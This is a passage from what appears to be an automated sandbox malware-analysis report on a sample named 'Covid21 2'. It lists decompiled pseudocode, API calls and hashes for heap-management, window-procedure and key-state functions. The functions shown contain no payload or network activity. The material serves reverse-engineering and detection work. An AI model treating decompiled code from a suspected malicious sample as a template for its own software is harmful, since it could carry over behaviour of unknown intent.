				_t13 = RtlAllocateHeap( *0x40b13c, 8, _t11 * _t16); // executed
				_t18[7] = _t13;
				return _t18;
			}









                                  0x00406709
                                  0x0040670b
                                  0x0040670f
                                  0x00406713
                                  0x00406716
                                  0x0040671a
                                  0x00406722
                                  0x00406725
                                  0x0040672e
                                  0x00406730
                                  0x00406737

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,00000020), ref: 00406703
                                  • RtlAllocateHeap.NTDLL(00000008,00001000), ref: 0040672E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 2da82372a442537a86186b481ed4c2f9dc507434d9ceacd4b474ffe9c94132e7
                                  • Instruction ID: ce11b295fd8b05f00f4da7b8697f56ae96f364287a54cd9b0d10b1d54926c8b9
                                  • Opcode Fuzzy Hash: 2da82372a442537a86186b481ed4c2f9dc507434d9ceacd4b474ffe9c94132e7
                                  • Instruction Fuzzy Hash: 73F0F8716047019FD324CF19ED11B16FBE8EF95710F01C82EE095A76A0D7B0A8048F94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404AB3, Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 50%
                                  			E00404AB3() {
				intOrPtr _t1;
				struct HICON__* _t3;
				intOrPtr _t5;

				_push(E00404925);
				_push(0x10);
				_t1 = E004066F1(0x30);
				_push(E00404A7E);
				_push(0);
				 *0x40b474 = _t1;
				 *0x40b478 = E00406434(0x58); // executed
				_t3 = LoadIconA( *0x40b140, 1); // executed
				 *0x40b47c = _t3;
				 *0x40b480 = LoadCursorA(0, 0x7f00);
				_push(0);
				_push(0);
				_t5 = E00406434(0x5c);
				 *0x40b3f4 = _t5;
				return _t5;
			}






                                  0x00404ab3
                                  0x00404ab8
                                  0x00404abc
                                  0x00404ac1
                                  0x00404ac6
                                  0x00404aca
                                  0x00404adc
                                  0x00404ae1
                                  0x00404aee
                                  0x00404af9
                                  0x00405082
                                  0x00405084
                                  0x00405088
                                  0x0040508d
                                  0x00405092

                                  APIs
                                    • Part of subcall function 004066F1: RtlAllocateHeap.NTDLL(00000008,00000020), ref: 00406703
                                    • Part of subcall function 004066F1: RtlAllocateHeap.NTDLL(00000008,00001000), ref: 0040672E
                                    • Part of subcall function 00406434: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00406441
                                  • LoadIconA.USER32(00000001,00000058), ref: 00404AE1
                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404AF3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: AllocateHeap$Load$CursorIcon
                                  • String ID:
                                  • API String ID: 1647777986-0
                                  • Opcode ID: 74b9dfc121d2eb6587da946b264171bc6af57f7eaa7434eef5bdc973725ae746
                                  • Instruction ID: 628aba79562989a39ce274caea0ed543473eac5be4649110be352ed123aa9c74
                                  • Opcode Fuzzy Hash: 74b9dfc121d2eb6587da946b264171bc6af57f7eaa7434eef5bdc973725ae746
                                  • Instruction Fuzzy Hash: 6CF0C9B0AC1305AAEB105F715E0BF163660E704B45F60443ABA417A2E2DBF95150AF8D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407470, Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 659 407470-4074b6 HeapCreate RtlAllocateHeap
                                  C-Code - Quality: 100%
                                  			E00407470() {
				void* _t1;
				long _t2;
				void* _t3;
				void* _t4;

				_t1 = HeapCreate(1, 0x1000, 0); // executed
				 *0x40b3fc = _t1;
				 *0x40b3f8 = 0;
				 *0x40b48c = 0x10;
				_t2 =  *0x40b48c; // 0x4104
				_t4 =  *0x40b3fc; // 0x29a0000
				_t3 = RtlAllocateHeap(_t4, 1, _t2);
				 *0x40a38c = _t3;
				return _t3;
			}







                                  0x0040747c
                                  0x00407482
                                  0x00407487
                                  0x00407491
                                  0x0040749b
                                  0x004074a3
                                  0x004074aa
                                  0x004074b0
                                  0x004074b6

                                  APIs
                                  • HeapCreate.KERNELBASE(00000001,00001000,00000000,?,00401049,00000000,00001000,00000000,00000000), ref: 0040747C
                                  • RtlAllocateHeap.NTDLL(029A0000,00000001,00004104), ref: 004074AA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateCreate
                                  • String ID:
                                  • API String ID: 2875408731-0
                                  • Opcode ID: d8f8987bb97edb255ba3889bf5c0dc041ec10e30f73c29571913b02a327f35f2
                                  • Instruction ID: 19be193239eadfd6624696bddd9959c39b43b36c58367bdf702e2eb6773df9a6
                                  • Opcode Fuzzy Hash: d8f8987bb97edb255ba3889bf5c0dc041ec10e30f73c29571913b02a327f35f2
                                  • Instruction Fuzzy Hash: 2AE0B6B018030AAFE3008F52EE45B553BA8E304704F108425FE44AB2E2C7B66454AFAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403694, Relevance: 3.0, APIs: 2, Instructions: 4COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 403694-4036a1 6FA4DB20 CoInitialize
                                  C-Code - Quality: 37%
                                  			E00403694() {
				void* _t1;

				L00407E14();
				_t1 =  *0x40a88c(0); // executed
				return _t1;
			}




                                  0x00403694
                                  0x0040369b
                                  0x004036a1

                                  APIs
                                  • 6FA4DB20.COMCTL32(0040106C,00000000,00001000,00000000,00000000), ref: 00403694
                                  • CoInitialize.OLE32(00000000), ref: 0040369B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Initialize
                                  • String ID:
                                  • API String ID: 2538663250-0
                                  • Opcode ID: 49e222b2d56f548959c65dd71d5b368c1574338499d51fc90ab1b458b9a7ed0b
                                  • Instruction ID: 29068fd5cd95f449554aa114ea224efd59727ecef1bc25bc8998cc2648164d1b
                                  • Opcode Fuzzy Hash: 49e222b2d56f548959c65dd71d5b368c1574338499d51fc90ab1b458b9a7ed0b
                                  • Instruction Fuzzy Hash: DAA0027194924056DD4477619A0B7093650578178AF0084E9B506752D64E78182185BB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407750, Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00407750(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t18;
				void* _t22;
				void* _t25;

				_t10 =  *0x40b3f8; // 0x0
				_v12 = _t10 + _a4;
				_t18 =  *0x40b48c; // 0x4104
				if(_v12 >= _t18 - 4) {
					 *0x40b48c = _v12 + 0x4000;
					_t15 =  *0x40b48c; // 0x4104
					_t22 =  *0x40a38c; // 0x29a06f0
					_t25 =  *0x40b3fc; // 0x29a0000
					_t17 = RtlReAllocateHeap(_t25, 1, _t22, _t15 + 5); // executed
					 *0x40a38c = _t17;
				}
				_t12 =  *0x40a38c; // 0x29a06f0
				_v8 = _t12 + _a8;
				 *0x40b3f8 = _a8 + _a4;
				return _v8;
			}












                                  0x00407756
                                  0x0040775e
                                  0x00407761
                                  0x0040776d
                                  0x00407778
                                  0x0040777e
                                  0x00407787
                                  0x00407790
                                  0x00407797
                                  0x0040779d
                                  0x0040779d
                                  0x004077a2
                                  0x004077aa
                                  0x004077b3
                                  0x004077bf

                                  APIs
                                  • RtlReAllocateHeap.NTDLL(029A0000,00000001,029A06F0,000040FF), ref: 00407797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: b741e1a18e1ec6a1c8cc36c4e8ff102d5075275f906b6a1070ac9639d2900657
                                  • Instruction ID: c9249488049c71a3dc6bfb1d13f9ea7f9653b61409185b4aebe1202f111d2c66
                                  • Opcode Fuzzy Hash: b741e1a18e1ec6a1c8cc36c4e8ff102d5075275f906b6a1070ac9639d2900657
                                  • Instruction Fuzzy Hash: 6F01F275900208EFC708CF59EA81A597BF4EB88304B10C039ED49A7352D334AA64DFAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004030A0, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E004030A0(void* __eax, signed int _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* _t14;
				void* _t15;
				intOrPtr _t19;

				_push(__eax);
				_t14 = RtlAllocateHeap( *0x40b13c, 8, _a4 * (__eax + 1) + 0x18); // executed
				_pop(_t19);
				_t15 = _t14;
				if(_t15 != 0) {
					 *((intOrPtr*)(_t15 + 0x10)) = _t19;
					 *((intOrPtr*)(_t15 + 4)) = _v4;
					 *((intOrPtr*)(_t15 + 8)) = _v0;
					 *((intOrPtr*)(_t15 + 0xc)) = _a4;
					 *((intOrPtr*)(_t15 + 0x14)) = _a8;
					 *_t15 = 1;
					_t15 = _t15 + 0x18;
				}
				 *_a4 = _t15;
				return _t15;
			}








                                  0x004030a0
                                  0x004030b5
                                  0x004030ba
                                  0x004030bb
                                  0x004030bd
                                  0x004030bf
                                  0x004030c6
                                  0x004030cd
                                  0x004030d4
                                  0x004030db
                                  0x004030de
                                  0x004030e4
                                  0x004030e4
                                  0x004030eb
                                  0x004030ed

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,-00000018,00000401), ref: 004030B5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: fde173810f0f770b3ee8f92bf0d91459233e569a11f5aae0c4369e4be50e7f1b
                                  • Instruction ID: 45182e430f07211e2c2e7b9e92e733268b633b3e5bb8cd087db9ad99d1a89cb5
                                  • Opcode Fuzzy Hash: fde173810f0f770b3ee8f92bf0d91459233e569a11f5aae0c4369e4be50e7f1b
                                  • Instruction Fuzzy Hash: 5BF0BCB1604701AFC308CF05C940A0AFBE6EFC9311F25C96AE4889B36AE775D842CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405F90, Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405F90(void** _a4) {
				long _v4;
				void** _t20;

				_t20 = _a4;
				_v4 = 0;
				if(_t20[5] == 0) {
					WriteFile( *_t20, _t20[1], _t20[2] - _t20[3],  &_v4, 0); // executed
					_t20[3] = _t20[2];
					return _v4;
				}
				return 0;
			}





                                  0x00405f92
                                  0x00405f9b
                                  0x00405f9f
                                  0x00405fb5
                                  0x00405fc2
                                  0x00000000
                                  0x00405fc2
                                  0x00405fc7

                                  APIs
                                  • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,004063E4,00000000,?,?,?,00406298,00000000,?,?), ref: 00405FB5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: e39570a374a9e73ecbca4878267657e2ccddeabf15ea9a18561b4119754d7263
                                  • Instruction ID: eebe7d1dfbf70ebc15f045d01e808d655b32d5a11f46bacfc96fedd4abe8ca9e
                                  • Opcode Fuzzy Hash: e39570a374a9e73ecbca4878267657e2ccddeabf15ea9a18561b4119754d7263
                                  • Instruction Fuzzy Hash: 90E0AEB6514701AFC324DF68C948C67B7F8EB88620B00C92EA49A93A00E630F840CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406807, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406807() {
				void* _t1;

				_t1 = HeapCreate(0, 0x400, 0); // executed
				 *0x40b488 = _t1;
				return _t1;
			}




                                  0x00406810
                                  0x00406816
                                  0x0040681b

                                  APIs
                                  • HeapCreate.KERNELBASE(00000000,00000400,00000000,0040104E,00000000,00001000,00000000,00000000), ref: 00406810
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: CreateHeap
                                  • String ID:
                                  • API String ID: 10892065-0
                                  • Opcode ID: fd7c27666d9665108ce7114c15ee3b21672111c673f59d957fe7748379cac578
                                  • Instruction ID: 872529c30d91ae6edf6e062b02dab6cc85b27c8051cf41dba879dba673cc5336
                                  • Opcode Fuzzy Hash: fd7c27666d9665108ce7114c15ee3b21672111c673f59d957fe7748379cac578
                                  • Instruction Fuzzy Hash: 25B012F428030056E3000B105D06B0436309300B02F204021BB44791E0C7B01000551D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403D90, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403D90() {
				void* _t1;

				_t1 = HeapCreate(0, 0x1000, 0); // executed
				 *0x40b44c = _t1;
				return _t1;
			}




                                  0x00403d99
                                  0x00403d9f
                                  0x00403da4

                                  APIs
                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,00401062,00000000,00001000,00000000,00000000), ref: 00403D99
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: CreateHeap
                                  • String ID:
                                  • API String ID: 10892065-0
                                  • Opcode ID: 5ebacb2a8a1c22710d2d4a0e59dd9adb87e4cd845f16d6a5353a8221d79a7afd
                                  • Instruction ID: e6ed55b92d251dbf60f0c4db2285402f79bbd6f4894813bfaa03374b9dc15d69
                                  • Opcode Fuzzy Hash: 5ebacb2a8a1c22710d2d4a0e59dd9adb87e4cd845f16d6a5353a8221d79a7afd
                                  • Instruction Fuzzy Hash: 7CB012B428130056E3200B105D06B003530D304B43F144021B644781E5C7F010104E0F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00405D3C, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 60keyboardwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E00405D3C(void* __ecx, struct HWND__* _a4) {
				char _v12;
				intOrPtr _t9;
				int _t18;

				if(GetKeyState(9) >= 0 || GetKeyState(0x11) < 0 || GetKeyState(0x10) < 0 || GetKeyState(0x12) < 0) {
					L6:
					if(GetPropA(_a4, "PB_WindowID") == 0) {
						goto L8;
					} else {
						_t9 =  *((intOrPtr*)(E00406690( *0x40b474, _t8 - 1) + 8));
					}
				} else {
					GetClassNameA(GetFocus(),  &_v12, 5);
					_push(4);
					_t18 =  &_v12;
					_push("Rich");
					_push(_t18);
					L00407DF0();
					if(_t18 != 0 || (SendMessageA(GetFocus(), 0x44e, _t18, _t18) & 0x00000800) != 0) {
						goto L6;
					} else {
						L8:
						_t9 = 0;
					}
				}
				return _t9;
			}






                                  0x00405d4e
                                  0x00405daa
                                  0x00405dba
                                  0x00000000
                                  0x00405dbc
                                  0x00405dc9
                                  0x00405dc9
                                  0x00405d68
                                  0x00405d77
                                  0x00405d7d
                                  0x00405d7f
                                  0x00405d82
                                  0x00405d87
                                  0x00405d88
                                  0x00405d92
                                  0x00000000
                                  0x00405dce
                                  0x00405dce
                                  0x00405dce
                                  0x00405dce
                                  0x00405d92
                                  0x00405dd2

                                  APIs
                                  • GetKeyState.USER32(00000009), ref: 00405D4A
                                  • GetKeyState.USER32(00000011), ref: 00405D52
                                  • GetKeyState.USER32(00000010), ref: 00405D5A
                                  • GetKeyState.USER32(00000012), ref: 00405D62
                                  • GetFocus.USER32 ref: 00405D74
                                  • GetClassNameA.USER32(00000000), ref: 00405D77
                                  • _strncoll.MSVCRT ref: 00405D88
                                  • GetFocus.USER32 ref: 00405D9B
                                  • SendMessageA.USER32(00000000,?,?,00000000), ref: 00405D9E
                                  • GetPropA.USER32(?,PB_WindowID), ref: 00405DB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: State$Focus$ClassMessageNamePropSend_strncoll
                                  • String ID: PB_WindowID$Rich
                                  • API String ID: 4045516979-1396934994
                                  • Opcode ID: 4e29aa54ef8f8318f8280b729776077f5b4d2819b0223c50274e8eba31a3af90
                                  • Instruction ID: 295880306d369912066631a8706d072366ea9287afa58a3d02d5e853e8738312
                                  • Opcode Fuzzy Hash: 4e29aa54ef8f8318f8280b729776077f5b4d2819b0223c50274e8eba31a3af90
                                  • Instruction Fuzzy Hash: 1F0125715407286AED006B61DD0AF9B3F6CEF10744F048533B901F71D6D679A815DAAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404714, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 61nativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00404714(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t14;
				intOrPtr* _t20;
				struct HWND__* _t28;
				void* _t30;

				_t28 = _a4;
				_t14 = GetWindowLongA(_t28, 0xfffffff4);
				_t27 = _t14;
				if(_t14 == 0xffffffff) {
					return  *0x40a7d0(_t28, _a8, _a12, _a16);
				}
				_t30 = E00406690( *0x40b46c, _t27);
				_a16 = CallWindowProcA( *(_t30 + 0xc), _t28, _a8, _a12, _a16);
				if(_a8 == 0x82) {
					_t20 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 4)) + 0xc));
					if(_t20 != 0) {
						 *_t20(_t30);
					}
					RemovePropA(_t28, "PB_ID");
					if(RemovePropA(_t28, "PB_DropAccept") != 0) {
						 *0x40a894(_t28);
					}
					SetWindowLongA(_t28, 0xfffffff4, 0xffffffff);
					E004066BB( *0x40b46c, _t27);
				}
				return _a16;
			}







                                  0x00404719
                                  0x0040471f
                                  0x00404725
                                  0x0040472a
                                  0x00000000
                                  0x004047af
                                  0x0040473c
                                  0x00404755
                                  0x00404758
                                  0x0040475d
                                  0x00404762
                                  0x00404765
                                  0x00404765
                                  0x00404773
                                  0x0040477f
                                  0x00404782
                                  0x00404782
                                  0x0040478d
                                  0x0040479a
                                  0x0040479a
                                  0x00000000

                                  APIs
                                  • GetWindowLongA.USER32(?,000000F4), ref: 0040471F
                                  • CallWindowProcA.USER32(?,?,?,?,?), ref: 00404748
                                  • RemovePropA.USER32(?,PB_ID), ref: 00404773
                                  • RemovePropA.USER32(?,PB_DropAccept), ref: 0040477B
                                  • RevokeDragDrop.OLE32(?), ref: 00404782
                                  • SetWindowLongA.USER32(?,000000F4,000000FF), ref: 0040478D
                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 004047AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Window$LongPropRemove$CallDragDropNtdllProcProc_Revoke
                                  • String ID: PB_DropAccept$PB_ID
                                  • API String ID: 1182866496-3688647018
                                  • Opcode ID: b8637c9f0dac8dec865cdb6307f1e69eacd637eb45f0958ff8c19843623d497f
                                  • Instruction ID: 26d55dd3bc0a13faf615adc1f81c0240ac0331d9be61dc94d2e7277a1ea7d7dc
                                  • Opcode Fuzzy Hash: b8637c9f0dac8dec865cdb6307f1e69eacd637eb45f0958ff8c19843623d497f
                                  • Instruction Fuzzy Hash: 36118231000205BFCB016F65ED84D6B3BB9EB867747108235F925721E1C7399C219B6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407E1A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71memorynativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E00407E1A(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				_Unknown_base(*)()* _v8;
				char _v60;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr _t38;
				void* _t39;

				sprintf( &_v60, "PB_GadgetStack_%i",  *0x40b140);
				_t39 = GetPropA(_a4,  &_v60);
				if(_t39 == 0) {
					L12:
					return  *0x40a7d0(_a4, _a8, _a12, _a16);
				}
				_v8 =  *((intOrPtr*)(_t39 + 0x14));
				if(_a8 == 0x82) {
					_t30 = E0040642D( *0x40b470);
					if( *((intOrPtr*)(_t30 + 0x10)) != 0) {
						_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 0xc))));
					} else {
						_t38 =  *_t30;
					}
					if( *_t39 == _t38) {
						 *_t30 = 0;
						 *((intOrPtr*)(_t30 + 0x10)) = 0;
					}
					_t31 =  *(_t39 + 8);
					if(_t31 != 0) {
						HeapFree( *0x40b13c, 0, _t31);
					}
					HeapFree( *0x40b13c, 0, _t39);
					RemovePropA(_a4,  &_v60);
				}
				if(_v8 == 0) {
					goto L12;
				} else {
					return CallWindowProcA(_v8, _a4, _a8, _a12, _a16);
				}
			}









                                  0x00407e31
                                  0x00407e46
                                  0x00407e4c
                                  0x00407ecb
                                  0x00000000
                                  0x00407ed7
                                  0x00407e58
                                  0x00407e5b
                                  0x00407e63
                                  0x00407e6b
                                  0x00407e74
                                  0x00407e6d
                                  0x00407e6d
                                  0x00407e6d
                                  0x00407e78
                                  0x00407e7a
                                  0x00407e7c
                                  0x00407e7c
                                  0x00407e7f
                                  0x00407e8b
                                  0x00407e95
                                  0x00407e95
                                  0x00407e9f
                                  0x00407ea8
                                  0x00407eae
                                  0x00407eb2
                                  0x00000000
                                  0x00407eb4
                                  0x00000000
                                  0x00407ec3

                                  APIs
                                  • sprintf.MSVCRT ref: 00407E31
                                  • GetPropA.USER32(?,?), ref: 00407E40
                                  • HeapFree.KERNEL32(00000000,?), ref: 00407E95
                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00407E9F
                                  • RemovePropA.USER32(?,?), ref: 00407EA8
